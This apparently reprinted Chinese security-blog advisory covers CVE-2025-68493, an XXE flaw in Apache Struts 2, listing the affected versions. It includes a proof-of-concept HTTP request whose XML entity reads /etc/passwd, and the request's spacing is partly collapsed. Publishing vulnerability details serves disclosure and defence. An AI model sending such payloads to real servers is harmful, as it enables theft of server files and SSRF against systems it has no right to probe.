首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >CVE-2025-68493|Apache Struts 2(S2-069)外部实体(XXE)注入漏洞(POC)

CVE-2025-68493|Apache Struts 2(S2-069)外部实体(XXE)注入漏洞(POC)

作者头像
信安百科
发布2026-01-27 14:23:06
发布2026-01-27 14:23:06
9660
举报
文章被收录于专栏:信安百科信安百科

0x00 前言

Apache Struts 2是Apache软件基金会开发的开源Java Web框架,采用 MVC架构,融合Struts与WebWork技术。

它通过拦截器处理请求,支持OGNL表达式语言和可重用标签API,具备良好的AJAX支持和线程安全性,广泛应用于企业级Java EE网络应用程序开发。

0x01 漏洞描述

漏洞源于XWork在解析XML配置文件时,未对XML外部实体进行充分校验与限制,导致攻击者可通过构造恶意XML内容触发外部实体解析。成功利用后,可能造成敏感数据泄露、拒绝服务(DoS)以及服务器端请求伪造(SSRF)等安全影响。

0x02 CVE编号

CVE-2025-68493(S2-069)

0x03 影响版本

代码语言:javascript
复制
Apache Struts [>= 2.0.0, <= 2.3.37];
Apache Struts [>= 2.5.0, <= 2.5.33];
Apache Struts [>= 6.0.0, <= 6.1.0];

0x04 漏洞详情

POC:

代码语言:javascript
复制

来源于网络:

POST/struts2-xml-parser/xmlParserNoDtdParseHTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/143.0.0.0Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

0x05 参考链接

https://cwiki.apache.org/confluence/display/WW/S2-069

推荐阅读:

CVE-2026-21440|AdonisJS远程代码执行漏洞(POC)

CVE-2025-52691|SmarterMail 未授权文件上传漏洞(POC)

CVE-2024-57521|RuoYi v4.7.9认证用户SQL注入漏洞(POC)

Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持

本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2026-01-24,如有侵权请联系 [email protected] 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 [email protected] 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档